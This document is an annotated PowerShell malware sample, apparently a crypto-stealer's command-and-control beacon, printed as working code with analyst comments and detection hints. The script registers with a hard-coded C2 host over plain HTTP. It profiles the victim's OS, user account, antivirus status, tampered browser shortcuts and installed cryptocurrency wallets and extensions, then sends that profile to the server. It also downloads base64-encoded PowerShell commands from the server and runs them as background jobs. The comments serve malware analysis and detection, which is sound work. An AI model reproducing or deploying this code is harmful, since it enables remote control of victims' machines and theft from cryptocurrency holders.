- # Embedded per-sample configuration.
- # $meta_request is a base64 blob that is decoded further down into a captured
- # HTTP/1.1 request (request line followed by "\r\n"-separated headers). Only the
- # request-line path is actually consumed: Get-UserInfo pulls its "?v=" query value
- # out of it and reports that as the "ver" field.
- $meta_request = 'Z2V0IC92Mi8yMDgyNzM1MS03ODdmLTRkM2EtODcxYS03YTUwNjA3NjdkMzg/dj12ZXJfMiBodHRwLzEuMQ0KaG9zdDogbXB6dmNzeG5oLmNvbQ0KdXNlci1hZ2VudDogcG9zdG1hbnJ1bnRpbWUvNy4yOS4yDQphY2NlcHQ6ICovKg0KY2FjaGUtY29udHJvbDogbm8tY2FjaGUNCnBvc3RtYW4tdG9rZW46IGNkZWI2Y2JiLWRjYTUtNDMyNi04ZGZmLTNkYTQ3NzlkZTMwZg0KYWNjZXB0LWVuY29kaW5nOiBnemlwLCBkZWZsYXRlLCBicg0KY29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KY29udGVudC1sZW5ndGg6IDANCg0K';
- # Sent as the first four bytes of every message body (Get-UserID and Get-Updates).
- $meta_version = 8748389;
- # Sent once, in the registration message built by Get-UserID; presumably a build /
- # campaign identifier assigned when the script was generated — not verifiable from here.
- $meta_guid = 91820;
- # Never used for a connection; only echoed back to the server as the "ip" field of the
- # host profile JSON. Looks like the client's public address filled in server-side — TODO confirm.
- $meta_ip = '54.86.50.139';
- # Real C2 host: HttpClient.BaseAddress below is "http://<this>" (plain HTTP, no TLS).
- $meta_host = 'wmail-endpoint.com';
- ############################
- # Single-instance guard. The script tries to create and own a named mutex; if the
- # name already exists another copy is running, so this one idles for five minutes
- # and exits rather than starting a second beacon loop.
- # Detection: the fixed mutex name is a stable host-based indicator for this sample.
- $createdNew = $false;
- $mutex = [System.Threading.Mutex]::new($true, "acb2f45f62c34c94bbd6e86734eb01a1", [ref]$createdNew);
- if ($createdNew -eq $false) {
- Start-Sleep -Seconds 300;
- return;
- }
- # Decode the embedded request and split it into lines: element 0 is the request
- # line ("METHOD PATH VERSION"), the following elements are "Name: value" headers.
- $_headers = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($meta_request)) -split "`r`n";
- $http_request = @{};
- $http_headers = @{};
- $_requestline = $_headers[0] -split ' ';
- # Keep only the path, restoring any percent-encoded braces ("%7b" / "%7d").
- $http_request.path = $_requestline[1].Replace('%7b', '{').Replace('%7d', '}');
- # Collect headers until the first line without a ": " separator (the blank line
- # that ends the header block). $http_headers is populated here but nothing in the
- # rest of this script reads it.
- for ($i = 1; $i -lt $_headers.Length; $i++) {
- [string[]]$h = $_headers[$i] -split ': ';
- if ($h.Length -lt 2) {
- break;
- }
- $http_headers[$h[0]] = $h[1];
- }
- # Run-scoped state shared by the functions below:
- #   id     - server-assigned session id; -1 means "not registered yet" (see Get-UserID)
- #   update - whether the next poll must include the full host profile (see Get-Updates)
- $session = @{};
- $session.id = -1;
- $session.update = $true;
- # Plain-HTTP client pointed at the hard-coded C2 host with a two-minute timeout.
- Add-Type -AssemblyName System.Net.Http
- $client = [System.Net.Http.HttpClient]::new();
- $client.Timeout = [TimeSpan]::FromMinutes(2);
- $client.BaseAddress = [Uri]::new("http://$($meta_host)");
- # The HTTP Host header is overwritten with a random 5-9 letter ".com" name on each
- # run (Get-Random -Maximum is exclusive), so proxy/web logs keyed on Host will show a
- # throw-away domain rather than $meta_host. The DNS lookup of $meta_host and the
- # resolved destination IP are the dependable network indicators here.
- $client.DefaultRequestHeaders.Host = "$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).com";
- # Thin wrapper over Get-WmiObject. Any error (e.g. a namespace that does not exist
- # on this host) is swallowed and $null is returned, so callers can pipe the result
- # straight into ForEach-Object without their own try/catch.
- function WMI {
- param (
- $namespace,
- $class
- )
- try {
- return Get-WmiObject -Namespace $namespace -Class $class;
- }
- catch {
- }
- return $null;
- }
- # Render one AntiVirusProduct WMI row as "<displayName> (<status>)".
- # Bits 12-15 of productState are masked off and mapped to the four states below;
- # any other value, or a productState that does not parse as uint32, yields "Unknown".
- function Get-AvStatus {
- param (
- $av
- )
- $status = "Unknown";
- try {
- $v = [uint32]::Parse($av.productState) -band 0xF000;
- switch ($v) {
- 0x0000 { $status = "Disabled" }
- 0x1000 { $status = "Enabled" }
- 0x2000 { $status = "Snoozed" }
- 0x3000 { $status = "Expired" }
- }
- }
- catch {
- }
- return "$($av.displayName) ($status)";
- }
- # Check whether the browser named by $appname (e.g. "chrome.exe") is installed and
- # whether its launcher shortcuts already carry a "--load-extension=<dir>" argument
- # that points at an existing directory. Every *.LNK in the global $searchPaths
- # (desktop, Start Menu, pinned taskbar) whose resolved target ends with $appname
- # is inspected through the WScript.Shell COM object.
- # Returns:
- #   $null           - no shortcut resolves to $appname
- #   'NOK'           - at least one matching shortcut lacks a working --load-extension
- #   "OK(<version>)" - every matching shortcut has one; <version> is read from the
- #                     "version" field of manifest.json in the last extension dir seen
- # Defender note: a --load-extension argument on a user's browser shortcuts is the
- # artefact this function keys on; auditing shortcut Arguments in these folders
- # surfaces the same tampering.
- function Get-InstallStatus {
- param (
- $appname
- )
- $versionName = '';
- $active = 0;
- $inactive = 0;
- # Group 1 captures the extension path, either double-quoted or unquoted-up-to-whitespace.
- $rgx = New-Object 'System.Text.RegularExpressions.Regex' '\s?--load-extension=(("[^\r\n"]*")|([^\r\n\s]*))';
- $shell = New-Object -comObject WScript.Shell
- for ($searchPath_index = 0; $searchPath_index -lt $searchPaths.Count; $searchPath_index++) {
- $searchPath = $searchPaths[$searchPath_index];
- if ((Test-Path $searchPath) -eq $false) {
- continue;
- }
- $lnks = Get-ChildItem -Path $searchPath -Filter "*.LNK"
- foreach ($lnk in $lnks) {
- $lnkobj = $shell.CreateShortcut($lnk.FullName);
- $target = $lnkobj.TargetPath;
- if ([string]::IsNullOrEmpty($target)) {
- continue;
- }
- if ((Test-Path $target) -eq $false) {
- continue;
- }
- # Normalise the target so the suffix comparison below is path-shape independent.
- $target = (Resolve-Path -Path $target).Path.ToLower();
- if ($target.EndsWith($appname, 'OrdinalIgnoreCase')) {
- $enabled = $false;
- $arguments = $lnkobj.Arguments;
- if ($null -ne $arguments) {
- $m = $rgx.Match($arguments);
- if ($m.Success -eq $true) {
- $path = $m.Groups[1].Value;
- $path = $path.Trim('"');
- # "Enabled" means the referenced extension directory still exists on disk.
- $enabled = ((Test-Path $path) -eq $true);
- if ($enabled) {
- try {
- # Best-effort version read; a missing or malformed manifest leaves $versionName as-is.
- $versionName = (Select-String -LiteralPath "$path\manifest.json" -Pattern '"version": "(.*)",').Matches.Groups[1].Value;
- }
- catch {
- }
- }
- }
- }
- if ($enabled) {
- $active++;
- }
- else {
- $inactive++;
- }
- }
- }
- }
- if (($active -eq 0) -and ($inactive -eq 0)) {
- return $null;
- }
- elseif ($inactive -gt 0) {
- return 'NOK';
- }
- return "OK($versionName)";
- }
- # Shortcut folders scanned by Get-InstallStatus. Defined after that function but
- # before it is first called, which is fine: PowerShell resolves the variable at call time.
- $searchPaths = @(
- "$env:USERPROFILE\Desktop",
- "$env:PUBLIC\Desktop",
- "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs",
- "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
- "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
- "$env:USERPROFILE\OneDrive\Desktop"
- );
- # Presence checks consumed by Get-Apps. Each entry is an environment-variable root
- # plus a list of {name, path}; "name" is added to the report when "<root>\<path>"
- # exists. The first two roots cover desktop wallet application data folders; the
- # remaining three are per-browser extension stores, where "path" is a 32-character
- # extension ID. The -A/-C/-E/-B name suffixes appear to encode the root
- # (AppData / Chrome / Edge / Brave) — inferred from the grouping, not stated anywhere.
- $searchEntries = @(
- [pscustomobject]@{
- root = '%appdata%'
- targets =
- [pscustomobject]@{
- name = 'Exodus-A'
- path = 'Exodus'
- },
- [pscustomobject]@{
- name = 'Atomic-A'
- path = 'Atomic Wallet'
- },
- [pscustomobject]@{
- name = 'Electrum-A'
- path = 'Electrum'
- },
- [pscustomobject]@{
- name = 'Ledger-A'
- path = 'Ledger Live'
- },
- [pscustomobject]@{
- name = 'Jaxx-A'
- path = 'Jaxx Liberty'
- },
- [pscustomobject]@{
- name = 'com.liberty.jaxx-A'
- path = 'com.liberty.jaxx'
- },
- [pscustomobject]@{
- name = 'Guarda-A'
- path = 'Guarda'
- },
- [pscustomobject]@{
- name = 'Armory-A'
- path = 'Armory'
- },
- [pscustomobject]@{
- name = 'DELTA-A'
- path = 'DELTA'
- },
- [pscustomobject]@{
- name = 'TREZOR-A'
- path = 'TREZOR Bridge'
- },
- [pscustomobject]@{
- name = 'Bitcoin-A'
- path = 'Bitcoin'
- },
- [pscustomobject]@{
- name = 'binance-A'
- path = 'binance'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%'
- targets =
- [pscustomobject]@{
- name = 'Blockstream-A'
- path = 'Blockstream Green'
- },
- [pscustomobject]@{
- name = 'Coinomi-A'
- path = 'Coinomi'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%\Google\Chrome\User Data\Default\Extensions'
- targets =
- [pscustomobject]@{
- name = 'Metamask-C'
- path = 'nkbihfbeogaeaoehlefnkodbefgpgknn'
- },
- [pscustomobject]@{
- name = 'MEWcx-C'
- path = 'nlbmnnijcnlegkjjpcfjclmcfggfefdm'
- },
- [pscustomobject]@{
- name = 'Coin98-C'
- path = 'aeachknmefphepccionboohckonoeemg'
- },
- [pscustomobject]@{
- name = 'Binance-C'
- path = 'fhbohimaelbohpjbbldcngcnapndodjp'
- },
- [pscustomobject]@{
- name = 'Jaxx-C'
- path = 'cjelfplplebdjjenllpjcblmjkfcffne'
- },
- [pscustomobject]@{
- name = 'Coinbase-C'
- path = 'hnfanknocfeofbddgcijnmhnfnkdnaad'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%\Microsoft\Edge\User Data\Default\Extensions'
- targets =
- [pscustomobject]@{
- name = 'Metamask-E'
- path = 'ejbalbakoplchlghecdalmeeeajnimhm'
- },
- [pscustomobject]@{
- name = 'Coinomi-E'
- path = 'gmcoclageakkbkbbflppkbpjcbkcfedg'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Extensions'
- targets =
- [pscustomobject]@{
- name = 'Metamask-B'
- path = 'nkbihfbeogaeaoehlefnkodbefgpgknn'
- },
- [pscustomobject]@{
- name = 'MEWcx-B'
- path = 'nlbmnnijcnlegkjjpcfjclmcfggfefdm'
- },
- [pscustomobject]@{
- name = 'Coin98-B'
- path = 'aeachknmefphepccionboohckonoeemg'
- },
- [pscustomobject]@{
- name = 'Binance-B'
- path = 'fhbohimaelbohpjbbldcngcnapndodjp'
- },
- [pscustomobject]@{
- name = 'Jaxx-B'
- path = 'cjelfplplebdjjenllpjcblmjkfcffne'
- },
- [pscustomobject]@{
- name = 'Coinbase-B'
- path = 'hnfanknocfeofbddgcijnmhnfnkdnaad'
- }
- }
- );
- # Build the comma-separated "apps" field of the host profile. Two kinds of entries:
- #   "<browser>-<status>" for each browser whose shortcuts Get-InstallStatus could
- #   find, e.g. "chrome-NOK" or "brave-OK(1.2.3)"; browsers with no shortcut are omitted
- #   the bare target name from $searchEntries for every wallet / extension dir present
- function Get-Apps {
- $results = New-Object Collections.Generic.List[string];
- $appEntries = @('chrome.exe', 'brave.exe', 'msedge.exe');
- foreach ($appEntry in $appEntries) {
- $status = Get-InstallStatus $appEntry;
- if ($null -eq $status) {
- continue;
- }
- $results.Add("$([System.IO.Path]::GetFileNameWithoutExtension($appEntry))-$($status)");
- }
- foreach ($entry in $searchEntries) {
- # Expand "%appdata%" / "%localappdata%" in the root before joining.
- $rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
- foreach ($target in $entry.targets) {
- if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
- $results.Add($target.name)
- }
- }
- }
- return [string]::Join(', ', $results);
- }
- # Assemble the host profile as compact JSON. Fields:
- #   os   - Win32_OperatingSystem caption and architecture
- #   cm   - DOMAIN\username of the running user
- #   av   - every AntiVirusProduct row from root\SecurityCenter and root\SecurityCenter2,
- #          rendered by Get-AvStatus (missing namespaces contribute nothing, see WMI)
- #   apps - browser extension status and wallet presence from Get-Apps
- #   ip   - the embedded $meta_ip constant
- #   ver  - the "?v=" query value taken from the embedded request path
- # Detection: the SecurityCenter2 AntiVirusProduct query from a PowerShell host is a
- # common reconnaissance step worth correlating with the outbound HTTP POST that follows.
- function Get-UserInfo {
- $os = WMI "root\cimv2" "Win32_OperatingSystem";
- $avs = New-Object 'Collections.Generic.List[string]';
- WMI "root\SecurityCenter" "AntiVirusProduct" | ForEach-Object { $avs.Add((Get-AvStatus $_)) }
- WMI "root\SecurityCenter2" "AntiVirusProduct" | ForEach-Object { $avs.Add((Get-AvStatus $_)) }
- $info = @{
- os = "$($os.Caption) ($($os.OSArchitecture))";
- cm = "$($env:USERDOMAIN)\$($env:USERNAME)";
- av = "$([string]::Join(', ', $avs))";
- apps = [string](Get-Apps);
- ip = $meta_ip;
- ver = (($http_request.path | Select-String -Pattern '\?v=(.*)&?').Matches.Groups[1].Value);
- }
- return ConvertTo-Json $info -Compress;
- }
- # Register with the server once and cache the returned session id in $session.id.
- # Request body (9 bytes, little-endian): uint32 $meta_version | byte 0x01 | uint32 $meta_guid.
- # The 0x01 byte distinguishes this message from the 0x02 poll in Get-Updates — a
- # message-type field, inferred from the two call sites.
- # Expects exactly 4 bytes back, interpreted as the int32 session id; any other
- # length raises (caught by the retry loop at the bottom of the script).
- function Get-UserID {
- if ($session.id -ne -1) {
- return $session.id;
- }
- $ms = New-Object 'System.IO.MemoryStream'
- $ms.Write([BitConverter]::GetBytes([uint32]$meta_version), 0, 4);
- $ms.WriteByte(1);
- $ms.Write([BitConverter]::GetBytes([uint32]$meta_guid), 0, 4);
- $data = $ms.ToArray();
- $ms.Dispose();
- # Synchronous POST to BaseAddress (empty relative URI); the HTTP status is checked
- # but $sts itself is never used.
- $r = $client.PostAsync('', [Net.Http.ByteArrayContent]::new($data)).GetAwaiter().GetResult();
- $sts = $r.EnsureSuccessStatusCode();
- $res = $r.Content.ReadAsByteArrayAsync().GetAwaiter().GetResult();
- $r.Dispose();
- if ($res.Length -ne 4) {
- throw "";
- }
- $session.id = [BitConverter]::ToInt32($res, 0);
- return $session.id;
- }
- # One poll of the server. Body (little-endian):
- #   uint32 $meta_version | byte 0x02 | int32 session id | [UTF-8 profile JSON]
- # The profile JSON is appended only while $session.update is set. If building it
- # throws, a JSON object with the exception message, line and offset is sent instead,
- # so script errors on the host are reported back to the operator.
- # Response: uint32 flags, then optional UTF-8 text. Bit 0 of the flags decides
- # whether the next poll must resend the profile; any trailing bytes are returned as
- # the command string for Set-Updates, otherwise $null. Fewer than 4 bytes raises.
- function Get-Updates {
- $uid = Get-UserId;
- $ms = New-Object 'System.IO.MemoryStream'
- $ms.Write([BitConverter]::GetBytes([uint32]$meta_version), 0, 4);
- $ms.WriteByte(2);
- $ms.Write([BitConverter]::GetBytes([int]$uid), 0, 4);
- if ($session.update) {
- $_userinfo = '';
- try {
- $_userinfo = Get-UserInfo;
- }
- catch {
- $_userinfo = ConvertTo-Json @{
- error = $_.Exception.Message;
- line = $_.Exception.Line;
- offset = $_.Exception.Offset;
- }
- }
- [byte[]]$userinfo = [Text.Encoding]::UTF8.GetBytes($_userinfo);
- $ms.Write($userinfo, 0, $userinfo.Length);
- }
- $data = $ms.ToArray();
- $ms.Dispose();
- $r = $client.PostAsync('', [Net.Http.ByteArrayContent]::new($data)).GetAwaiter().GetResult();
- $sts = $r.EnsureSuccessStatusCode();
- $res = $r.Content.ReadAsByteArrayAsync().GetAwaiter().GetResult();
- $r.Dispose();
- if ($res.Length -lt 4) {
- throw "";
- }
- $f = [BitConverter]::ToUInt32($res, 0);
- # Server-controlled: keep resending the host profile until the server clears bit 0.
- $session.update = ($f -band 0x1) -eq 1;
- if ($res.Length -gt 4) {
- return ([Text.Encoding]::UTF8.GetString($res, 4, $res.Length - 4));
- }
- return $null;
- }
- # Execute server-supplied commands. $command is split on CRLF; each line is
- # base64-decoded to PowerShell source and run as a background job. Wait-Job gives
- # each job at most 10 seconds but never stops it or collects its output, so a
- # long-running payload simply keeps running while the next line is started.
- # Detection: Start-Job launches a separate PowerShell host process, and where
- # script block logging (Microsoft-Windows-PowerShell/Operational, event 4104) is
- # enabled the decoded text handed to [ScriptBlock]::Create is recorded in clear.
- function Set-Updates {
- param (
- [string]
- $command
- )
- $lines = $command -split "`r`n";
- foreach ($line in $lines) {
- $job = Start-Job -ScriptBlock ([Scriptblock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($line))))
- Wait-Job -Job $job -Timeout 10
- }
- }
- # Beacon loop. Polls every 30 s; on any exception (registration failure, HTTP
- # error, short response) it waits 10 s and retries. $retry is reset after every
- # successful poll, so the loop only ends after 10 consecutive failures — there is
- # no other exit condition. $res is declared here but never used.
- $retry = 0;
- [byte[]]$res = $null;
- while ($retry -lt 10) {
- try {
- $updates = Get-Updates;
- $retry = 0;
- if ($null -ne $updates) {
- Set-Updates $updates;
- }
- }
- catch {
- $retry++;
- Start-Sleep -Seconds 10;
- continue;
- }
- Start-Sleep -Seconds 30;
- }